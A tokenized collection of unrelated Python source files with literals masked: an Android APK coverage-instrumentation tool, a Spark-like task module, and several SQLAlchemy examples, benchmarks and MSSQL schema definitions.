"<STR_LIT>" ( dexFilePath , jarFilePath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> jarFilesRelativePaths . append ( jarFileRelativePath ) <EOL> return jarFilesRelativePaths <EOL> def _instrFilesWithEmma ( self , instrumenter , jarFilesRootDir , jarFilesRelativePaths , <EOL> instrJarsRootDir , coverageMetadataFile , proceedOnError = True ) : <EOL> instrJarFilesRelativePaths = [ ] <EOL> for jarFileRelativePath in jarFilesRelativePaths : <EOL> jarFileAbsPath = os . path . join ( jarFilesRootDir , jarFileRelativePath ) <EOL> instrJarRelativeDir = jarFileRelativePath [ : jarFileRelativePath . rfind ( "<STR_LIT:/>" ) + <NUM_LIT:1> ] <EOL> instrJarFullDir = os . path . join ( instrJarsRootDir , instrJarRelativeDir ) <EOL> try : <EOL> instrumenter . instrumentJarWithEmma ( jarFile = jarFileAbsPath , outputFolder = instrJarFullDir , emmaMetadataFile = coverageMetadataFile ) <EOL> except EmmaCannotInstrumentException as e : <EOL> if proceedOnError : <EOL> logger . warning ( "<STR_LIT>" ( jarFileAbsPath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> instrJarFilesRelativePaths . append ( jarFileRelativePath ) <EOL> return instrJarFilesRelativePaths <EOL> def _convertJar2DexWithInstr ( self , converter , instrJarsRootDir , <EOL> instrJarFilesRelativePaths , <EOL> finalDexFilesRootDir , proceedOnError ) : <EOL> instrDexFilesRelativePaths = [ ] <EOL> for jarFileRelativePath in instrJarFilesRelativePaths : <EOL> jarFileAbsPath = os . path . join ( instrJarsRootDir , jarFileRelativePath ) <EOL> dexFileRelativePath = os . path . splitext ( jarFileRelativePath ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> dexFileAbsPath = os . path . join ( finalDexFilesRootDir , dexFileRelativePath ) <EOL> print "<STR_LIT>" + jarFileRelativePath <EOL> try : <EOL> withFiles = [ ] <EOL> if jarFileRelativePath == "<STR_LIT>" : <EOL> emmaDevicePath = os . path . join ( self . config . getEmmaDir ( ) , self . config . getEmmaDeviceJar ( ) ) <EOL> withFiles . append ( self . config . getAndroidSpecificInstrumentationClassesPath ( ) ) <EOL> withFiles . append ( emmaDevicePath ) <EOL> converter . convertJar2Dex ( jarFile = jarFileAbsPath , <EOL> dexFile = dexFileAbsPath , <EOL> withFiles = withFiles , <EOL> overwrite = True ) <EOL> except Jar2DexConvertionError as e : <EOL> if proceedOnError : <EOL> logger . warning ( "<STR_LIT>" % ( jarFileAbsPath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> instrDexFilesRelativePaths . append ( dexFileRelativePath ) <EOL> return instrDexFilesRelativePaths <EOL> def _getUnInstrFilesRelativePaths ( self , dexFilesRelativePaths , instrDexFilesRelativePaths ) : <EOL> uninstrumentedFiles = [ ] <EOL> for dexFileRelativePath in dexFilesRelativePaths : <EOL> if dexFileRelativePath not in instrDexFilesRelativePaths : <EOL> uninstrumentedFiles . append ( dexFileRelativePath ) <EOL> return uninstrumentedFiles <EOL> def _instrAndroidManifest ( self , instrumenter , initAndroidManifest , instrAndroidManifest = None , addSdCardPermission = True ) : <EOL> success = True <EOL> try : <EOL> instrumenter . instrumentAndroidManifestFile ( initAndroidManifest , instrAndroidManifest , addSdCardPermission ) <EOL> except IllegalArgumentException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _compileApk ( self , compiler , fromDir , apkPath ) : <EOL> success = True <EOL> try : <EOL> compiler . buildApk ( fromDir , apkPath ) <EOL> except ApktoolBuildException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _putAdditionalResources ( self , apk , resources ) : <EOL> zip_utils . zipdir ( resources , apk ) <EOL> def _signApk ( self , signer , unsignedApkFile , signedApkFile ) : <EOL> success = True <EOL> try : <EOL> signer . signApk ( unsignedApkFile , signedApkFile ) <EOL> except SignApkException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _alignApk ( self , aligner , unalignedApkFile , alignedApkFile ) : <EOL> success = True <EOL> try : <EOL> aligner . alignApk ( unalignedApkFile , alignedApkFile ) <EOL> except AlignApkException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _getDexFiles ( self , directory ) : <EOL> dexFileNames = auxiliary_utils . searchFiles ( where = directory , extension = "<STR_LIT>" ) <EOL> return dexFileNames <EOL> def _getDexFilePathsRelativeToDir ( self , target ) : <EOL> dexFileRelativePaths = auxiliary_utils . searchFilesRelativeToDir ( target = target , extension = "<STR_LIT>" ) <EOL> return dexFileRelativePaths <EOL> def initAlreadyInstrApkEnv ( self , pathToInstrApk , resultsDir , pathToInstrManifestFile = None ) : <EOL> if not apk_utils . checkInputApkFile ( pathToInstrApk ) : <EOL> logger . error ( "<STR_LIT>" % pathToInstrApk ) <EOL> return <EOL> if not os . path . isdir ( resultsDir ) : <EOL> logger . error ( "<STR_LIT>" % resultsDir ) <EOL> return <EOL> coverageMetadataFolderPath = os . path . join ( resultsDir , self . config . getCoverageMetadataRelativeDir ( ) ) <EOL> if not os . path . isdir ( coverageMetadataFolderPath ) : <EOL> logger . error ( "<STR_LIT>" % resultsDir ) <EOL> return <EOL> self . coverageMetadataFolder = coverageMetadataFolderPath <EOL> if self . config . getCoverageMetadataFilename ( ) not in os . listdir ( coverageMetadataFolderPath ) : <EOL> logger . error ( "<STR_LIT>" % self . coverageMetadataFolder ) <EOL> return <EOL> self . coverageMetadataFile = os . path . join ( self . coverageMetadataFolder , self . config . getCoverageMetadataFilename ( ) ) <EOL> if pathToInstrManifestFile : <EOL> androidManifestPath = pathToInstrManifestFile <EOL> else : <EOL> androidManifestPath = os . path . join ( resultsDir , "<STR_LIT>" ) <EOL> if not os . path . isfile ( androidManifestPath ) : <EOL> logger . warning ( "<STR_LIT>" % androidManifestPath ) <EOL> return <EOL> self . instrumentedApk = pathToInstrApk <EOL> self . apkResultsDir = resultsDir <EOL> self . runtimeReportsRootDir = self . _createDir ( resultsDir , self . config . getRuntimeReportsRelativeDir ( ) , False , False ) <EOL> self . androidManifestFile = androidManifestPath <EOL> self . androidManifest = AndroidManifest ( self . androidManifestFile ) <EOL> self . packageName = self . androidManifest . getInstrumentationTargetPackage ( ) <EOL> self . runnerName = self . androidManifest . getInstrumentationRunnerName ( ) <EOL> self . _bboxStateMachine . start ( STATE_VALID_SETTINGS_PROVIDED ) <EOL> def installApkOnDevice ( self ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_INSTALLED ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . bboxExecutor . selectExecutionDevice ( ) <EOL> try : <EOL> self . bboxExecutor . installApkOnDevice ( self . instrumentedApk ) <EOL> except ApkCannotBeInstalledException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> return <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_INSTALLED ) <EOL> def startTesting ( self ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_TEST_STARTED ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . deviceReportFolder = os . path . join ( DEVICE_REPORT_FOLDER_PATH , self . packageName ) <EOL> self . bboxExecutor . selectExecutionDevice ( ) <EOL> self . bboxExecutor . startOndeviceTesting ( packageName = self . packageName , <EOL> runnerName = self . runnerName , <EOL> coverage = True , <EOL> reportFolder = self . deviceReportFolder , <EOL> proceedOnError = True , <EOL> generateCoverageReportOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_TEST_STARTED ) <EOL> def stopTesting ( self , localReportFolderName = None , paramsToWrite = None ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_FINISHED_TESTING ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> if not localReportFolderName : <EOL> localReportFolderName = "<STR_LIT:test>" <EOL> localReportFolder = self . _createDir ( self . runtimeReportsRootDir , localReportFolderName , True , False ) <EOL> self . bboxExecutor . stopOndeviceTesting ( cancelAnalysis = False ) <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> success = self . bboxExecutor . getFileFromDevice ( self . deviceReportFolder , localReportFolder ) <EOL> if not success : <EOL> self . bboxExecutor . removeFile ( self . deviceReportFolder ) <EOL> return None <EOL> if paramsToWrite : <EOL> params_config = ConfigParser . ConfigParser ( ) <EOL> params_config . add_section ( PARAMS_SECTION ) <EOL> for param in iteritems ( paramsToWrite ) : <EOL> params_config . set ( PARAMS_SECTION , param [ <NUM_LIT:0> ] , param [ <NUM_LIT:1> ] ) <EOL> with open ( os . path . join ( localReportFolder , "<STR_LIT>" ) , "<STR_LIT:w>" ) as param_file : <EOL> params_config . write ( param_file ) <EOL> self . bboxExecutor . removeFile ( self . deviceReportFolder ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_FINISHED_TESTING ) <EOL> return localReportFolder <EOL> def generateReport ( self , reportFiles = [ ] , reportName = None , reportType = EMMA_REPORT . XML ) : <EOL> if not reportFiles : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . bboxReporter . cleanMetaFiles ( ) <EOL> self . bboxReporter . cleanReportFiles ( ) <EOL> self . bboxReporter . addMetaFile ( self . coverageMetadataFile ) <EOL> for rFile in reportFiles : <EOL> self . bboxReporter . addReportFile ( rFile ) <EOL> reportsRoot = os . path . join ( self . apkResultsDir , self . config . getReportsRelativeDir ( ) ) <EOL> where = self . _createReportResultsDir ( reportsRoot , "<STR_LIT>" % reportType ) <EOL> self . bboxReporter . generateEmmaReport ( where , reportName , reportType ) <EOL> def _createReportResultsDir ( self , reportsRoot , reportDirName ) : <EOL> i = <NUM_LIT:0> <EOL> resultsDir = os . path . join ( reportsRoot , reportDirName ) <EOL> while os . path . exists ( resultsDir ) : <EOL> i += <NUM_LIT:1> <EOL> resultsDir = os . path . join ( reportsRoot , "<STR_LIT>" % ( reportDirName , i ) ) <EOL> auxiliary_utils . mkdir ( path = resultsDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = False ) <EOL> return resultsDir <EOL> def uninstallPackage ( self ) : <EOL> self . bboxExecutor . uninstallPackage ( packageName = self . packageName , keepData = False ) <EOL> self . _bboxStateMachine . stop ( ) <EOL> @ staticmethod <EOL> def getCoverageReportsFromFolderWithPrefix ( folder , prefix ) : <EOL> if not os . path . exists ( folder ) : <EOL> return None <EOL> reports = [ ] <EOL> for file in os . listdir ( folder ) : <EOL> if file . endswith ( "<STR_LIT>" ) and file . startswith ( prefix ) : <EOL> reports . append ( os . path . join ( folder , file ) ) <EOL> return reports <EOL> class ApkIsNotValidException ( MsgException ) : <EOL> '''<STR_LIT>''' <EOL> class IncorrectStateSequenceException ( MsgException ) : <EOL> '''<STR_LIT>''' </s>
<s> import pickle <EOL> from mdpark . utils import load_func , dump_func <EOL> from mdpark . shuffle import LocalFileShuffle <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class TaskContext : <EOL> def __init__ ( self , stageId , splitId , attemptId ) : <EOL> self . stageId = stageId <EOL> self . splitId = splitId <EOL> self . attemptId = attemptId <EOL> class TaskResult : <EOL> def __init__ ( self , value , accumUpdates ) : <EOL> self . value = value <EOL> self . accumUpdates = accumUpdates <EOL> class Task : <EOL> nextId = <NUM_LIT:0> <EOL> @ classmethod <EOL> def newId ( cls ) : <EOL> cls . nextId += <NUM_LIT:1> <EOL> return cls . nextId <EOL> def run ( self , id ) : <EOL> raise NotImplementedError <EOL> def preferredLocations ( self ) : <EOL> raise NotImplementedError <EOL> class DAGTask ( Task ) : <EOL> def __init__ ( self , stageId ) : <EOL> self . id = self . newId ( ) <EOL> self . stageId = stageId <EOL> class ResultTask ( DAGTask ) : <EOL> def __init__ ( self , stageId , rdd , func , partition , locs , outputId ) : <EOL> DAGTask . __init__ ( self , stageId ) <EOL> self . rdd = rdd <EOL> self . func = func <EOL> self . partition = partition <EOL> self . split = rdd . splits [ partition ] <EOL> self . locs = locs <EOL> self . outputId = outputId <EOL> def run ( self , attemptId ) : <EOL> context = TaskContext ( self . stageId , self . partition , attemptId ) <EOL> return self . func ( context , self . rdd . iterator ( self . split ) ) <EOL> def preferredLocations ( self ) : <EOL> return self . locs <EOL> def __hash__ ( self ) : <EOL> return self . rdd . id * <NUM_LIT> + self . partition <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . stageId , self . partition ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> def __getstate__ ( self ) : <EOL> d = dict ( self . __dict__ ) <EOL> del d [ '<STR_LIT>' ] <EOL> return d , dump_func ( self . func ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ , code = state <EOL> self . func = load_func ( code , globals ( ) ) <EOL> class ShuffleMapTask ( DAGTask ) : <EOL> def __init__ ( self , stageId , rdd , dep , partition , locs ) : <EOL> DAGTask . __init__ ( self , stageId ) <EOL> self . stageId = stageId <EOL> self . rdd = rdd <EOL> self . dep = dep <EOL> self . partition = partition <EOL> self . split = rdd . splits [ partition ] <EOL> self . locs = locs <EOL> def run ( self , attempId ) : <EOL> aggregator = self . dep . aggregator <EOL> partitioner = self . dep . partitioner <EOL> numOutputSplits = partitioner . numPartitions <EOL> buckets = [ { } for i in range ( numOutputSplits ) ] <EOL> for k , v in self . rdd . iterator ( self . split ) : <EOL> bucketId = partitioner . getPartition ( k ) <EOL> bucket = buckets [ bucketId ] <EOL> if k in bucket : <EOL> bucket [ k ] = aggregator . mergeValue ( bucket [ k ] , v ) <EOL> else : <EOL> bucket [ k ] = aggregator . createCombiner ( v ) <EOL> for i in range ( numOutputSplits ) : <EOL> path = LocalFileShuffle . getOutputFile ( self . dep . shuffleId , <EOL> self . partition , i ) <EOL> f = open ( path , '<STR_LIT:w>' ) <EOL> logger . info ( '<STR_LIT>' , buckets [ i ] . items ( ) ) <EOL> pickle . dump ( buckets [ i ] . items ( ) , f ) <EOL> f . close ( ) <EOL> return LocalFileShuffle . getServerUri ( ) </s>
<s> """<STR_LIT>""" <EOL> from sqlalchemy import ( MetaData , Table , Column , Integer , String , ForeignKey , <EOL> Unicode , and_ , create_engine ) <EOL> from sqlalchemy . orm import mapper , relationship , Session , lazyload <EOL> import sys , os , io , re <EOL> from xml . etree import ElementTree <EOL> e = create_engine ( '<STR_LIT>' ) <EOL> meta = MetaData ( ) <EOL> documents = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:filename>' , String ( <NUM_LIT:30> ) , unique = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> elements = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Unicode ( <NUM_LIT:30> ) , nullable = False ) , <EOL> Column ( '<STR_LIT:text>' , Unicode ) , <EOL> Column ( '<STR_LIT>' , Unicode ) <EOL> ) <EOL> attributes = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:name>' , Unicode ( <NUM_LIT:100> ) , nullable = False , primary_key = True ) , <EOL> Column ( '<STR_LIT:value>' , Unicode ( <NUM_LIT:255> ) ) ) <EOL> meta . create_all ( e ) <EOL> class Document ( object ) : <EOL> def __init__ ( self , name , element ) : <EOL> self . filename = name <EOL> self . element = element <EOL> def __str__ ( self ) : <EOL> buf = io . StringIO ( ) <EOL> self . element . write ( buf ) <EOL> return buf . getvalue ( ) <EOL> class _Node ( object ) : <EOL> pass <EOL> class _Attribute ( object ) : <EOL> def __init__ ( self , name , value ) : <EOL> self . name = name <EOL> self . value = value <EOL> mapper ( Document , documents , properties = { <EOL> '<STR_LIT>' : relationship ( _Node , lazy = '<STR_LIT>' , cascade = "<STR_LIT:all>" ) <EOL> } ) <EOL> mapper ( _Node , elements , properties = { <EOL> '<STR_LIT>' : relationship ( _Node , cascade = "<STR_LIT:all>" ) , <EOL> '<STR_LIT>' : relationship ( _Attribute , lazy = '<STR_LIT>' , cascade = "<STR_LIT>" ) , <EOL> } ) <EOL> mapper ( _Attribute , attributes ) <EOL> class ElementTreeMarshal ( object ) : <EOL> def __get__ ( self , document , owner ) : <EOL> if document is None : <EOL> return self <EOL> if hasattr ( document , '<STR_LIT>' ) : <EOL> return document . _element <EOL> def traverse ( node , parent = None ) : <EOL> if parent is not None : <EOL> elem = ElementTree . SubElement ( parent , node . tag ) <EOL> else : <EOL> elem = ElementTree . Element ( node . tag ) <EOL> elem . text = node . text <EOL> elem . tail = node . tail <EOL> for attr in node . attributes : <EOL> elem . attrib [ attr . name ] = attr . value <EOL> for child in node . children : <EOL> traverse ( child , parent = elem ) <EOL> return elem <EOL> document . _element = ElementTree . ElementTree ( traverse ( document . _root ) ) <EOL> return document . _element <EOL> def __set__ ( self , document , element ) : <EOL> def traverse ( node ) : <EOL> n = _Node ( ) <EOL> n . tag = str ( node . tag ) <EOL> n . text = str ( node . text ) <EOL> n . tail = str ( node . tail ) <EOL> n . children = [ traverse ( n2 ) for n2 in node ] <EOL> n . attributes = [ _Attribute ( str ( k ) , str ( v ) ) for k , v in node . attrib . items ( ) ] <EOL> return n <EOL> document . _root = traverse ( element . getroot ( ) ) <EOL> document . _element = element <EOL> def __delete__ ( self , document ) : <EOL> del document . _element <EOL> document . _root = [ ] <EOL> Document . element = ElementTreeMarshal ( ) <EOL> line = "<STR_LIT>" <EOL> session = Session ( e ) <EOL> for file in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> filename = os . path . join ( os . path . dirname ( __file__ ) , file ) <EOL> doc = ElementTree . parse ( filename ) <EOL> session . add ( Document ( file , doc ) ) <EOL> print ( "<STR_LIT>" , line ) <EOL> session . commit ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , line ) <EOL> document = session . query ( Document ) . filter_by ( filename = "<STR_LIT>" ) . first ( ) <EOL> print ( document ) <EOL> d = session . query ( Document ) . join ( '<STR_LIT>' , aliased = True ) . filter ( _Node . tag == '<STR_LIT>' ) . join ( '<STR_LIT>' , aliased = True , from_joinpoint = True ) . filter ( _Node . tag == '<STR_LIT>' ) . join ( '<STR_LIT>' , aliased = True , from_joinpoint = True ) . filter ( <EOL> and_ ( _Node . tag == '<STR_LIT>' , _Node . text == '<STR_LIT>' ) ) . one ( ) <EOL> print ( d ) <EOL> def find_document ( path , compareto ) : <EOL> j = documents <EOL> prev_elements = None <EOL> query = session . query ( Document ) <EOL> attribute = '<STR_LIT>' <EOL> for i , match in enumerate ( re . finditer ( r'<STR_LIT>' , path ) ) : <EOL> ( token , attrname , attrvalue ) = match . group ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> query = query . join ( attribute , aliased = True , from_joinpoint = True ) . filter ( _Node . tag == token ) <EOL> attribute = '<STR_LIT>' <EOL> if attrname : <EOL> if attrvalue : <EOL> query = query . join ( '<STR_LIT>' , aliased = True , from_joinpoint = True ) . filter ( <EOL> and_ ( _Attribute . name == attrname , _Attribute . value == attrvalue ) ) <EOL> else : <EOL> query = query . join ( '<STR_LIT>' , aliased = True , from_joinpoint = True ) . filter ( <EOL> _Attribute . name == attrname ) <EOL> return query . options ( lazyload ( '<STR_LIT>' ) ) . filter ( _Node . text == compareto ) . all ( ) <EOL> for path , compareto in ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) : <EOL> print ( "<STR_LIT>" % ( path , compareto ) , line ) <EOL> print ( [ d . filename for d in find_document ( path , compareto ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . import Profiler <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy import Column , Integer , String , create_engine <EOL> from sqlalchemy . orm import Session , Bundle <EOL> Base = declarative_base ( ) <EOL> engine = None <EOL> class Customer ( Base ) : <EOL> __tablename__ = "<STR_LIT>" <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:255> ) ) <EOL> description = Column ( String ( <NUM_LIT:255> ) ) <EOL> Profiler . init ( "<STR_LIT>" , num = <NUM_LIT> ) <EOL> @ Profiler . setup_once <EOL> def setup_database ( dburl , echo , num ) : <EOL> global engine <EOL> engine = create_engine ( dburl , echo = echo ) <EOL> Base . metadata . drop_all ( engine ) <EOL> Base . metadata . create_all ( engine ) <EOL> s = Session ( engine ) <EOL> for chunk in range ( <NUM_LIT:0> , num , <NUM_LIT> ) : <EOL> s . execute ( <EOL> Customer . __table__ . insert ( ) , <EOL> params = [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' % i , <EOL> '<STR_LIT:description>' : '<STR_LIT>' % i <EOL> } for i in range ( chunk , chunk + <NUM_LIT> ) ] ) <EOL> s . commit ( ) <EOL> @ Profiler . profile <EOL> def test_orm_full_objects_list ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> objects = list ( sess . query ( Customer ) . limit ( n ) ) <EOL> @ Profiler . profile <EOL> def test_orm_full_objects_chunks ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> for obj in sess . query ( Customer ) . yield_per ( <NUM_LIT:1000> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . profile <EOL> def test_orm_bundles ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> bundle = Bundle ( '<STR_LIT>' , <EOL> Customer . id , Customer . name , Customer . description ) <EOL> for row in sess . query ( bundle ) . yield_per ( <NUM_LIT> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . profile <EOL> def test_orm_columns ( n ) : <EOL> """<STR_LIT>""" <EOL> sess = Session ( engine ) <EOL> for row in sess . query ( <EOL> Customer . id , Customer . name , <EOL> Customer . description ) . yield_per ( <NUM_LIT> ) . limit ( n ) : <EOL> pass <EOL> @ Profiler . profile <EOL> def test_core_fetchall ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execute ( Customer . __table__ . select ( ) . limit ( n ) ) . fetchall ( ) <EOL> for row in result : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_core_fetchmany_w_streaming ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execution_options ( stream_results = True ) . execute ( Customer . __table__ . select ( ) . limit ( n ) ) <EOL> while True : <EOL> chunk = result . fetchmany ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> for row in chunk : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_core_fetchmany ( n ) : <EOL> """<STR_LIT>""" <EOL> with engine . connect ( ) as conn : <EOL> result = conn . execute ( Customer . __table__ . select ( ) . limit ( n ) ) <EOL> while True : <EOL> chunk = result . fetchmany ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> for row in chunk : <EOL> data = row [ '<STR_LIT:id>' ] , row [ '<STR_LIT:name>' ] , row [ '<STR_LIT:description>' ] <EOL> @ Profiler . profile <EOL> def test_dbapi_fetchall_plus_append_objects ( n ) : <EOL> """<STR_LIT>""" <EOL> _test_dbapi_raw ( n , True ) <EOL> @ Profiler . profile <EOL> def test_dbapi_fetchall_no_object ( n ) : <EOL> """<STR_LIT>""" <EOL> _test_dbapi_raw ( n , False ) <EOL> def _test_dbapi_raw ( n , make_objects ) : <EOL> compiled = Customer . __table__ . select ( ) . limit ( n ) . compile ( <EOL> dialect = engine . dialect , <EOL> compile_kwargs = { "<STR_LIT>" : True } ) <EOL> if make_objects : <EOL> class SimpleCustomer ( object ) : <EOL> def __init__ ( self , id , name , description ) : <EOL> self . id = id <EOL> self . name = name <EOL> self . description = description <EOL> sql = str ( compiled ) <EOL> conn = engine . raw_connection ( ) <EOL> cursor = conn . cursor ( ) <EOL> cursor . execute ( sql ) <EOL> if make_objects : <EOL> for row in cursor . fetchall ( ) : <EOL> customer = SimpleCustomer ( <EOL> id = row [ <NUM_LIT:0> ] , name = row [ <NUM_LIT:1> ] , description = row [ <NUM_LIT:2> ] ) <EOL> else : <EOL> for row in cursor . fetchall ( ) : <EOL> data = row [ <NUM_LIT:0> ] , row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] <EOL> conn . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> Profiler . main ( ) </s>
<s> from ... import Table , MetaData , Column <EOL> from ... types import String , Unicode , UnicodeText , Integer , TypeDecorator <EOL> from ... import cast <EOL> from ... import util <EOL> from ... sql import expression <EOL> from ... ext . compiler import compiles <EOL> ischema = MetaData ( ) <EOL> class CoerceUnicode ( TypeDecorator ) : <EOL> impl = Unicode <EOL> def process_bind_param ( self , value , dialect ) : <EOL> if util . py2k and isinstance ( value , util . binary_type ) : <EOL> value = value . decode ( dialect . encoding ) <EOL> return value <EOL> def bind_expression ( self , bindvalue ) : <EOL> return _cast_on_2005 ( bindvalue ) <EOL> class _cast_on_2005 ( expression . ColumnElement ) : <EOL> def __init__ ( self , bindvalue ) : <EOL> self . bindvalue = bindvalue <EOL> @ compiles ( _cast_on_2005 ) <EOL> def _compile ( element , compiler , ** kw ) : <EOL> from . import base <EOL> if compiler . dialect . server_version_info < base . MS_2005_VERSION : <EOL> return compiler . process ( element . bindvalue , ** kw ) <EOL> else : <EOL> return compiler . process ( cast ( element . bindvalue , Unicode ) , ** kw ) <EOL> schemata = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> tables = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( <EOL> "<STR_LIT>" , String ( convert_unicode = True ) , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> columns = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String ( <EOL> convert_unicode = True ) , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> column_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> key_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , Integer , <EOL> key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) 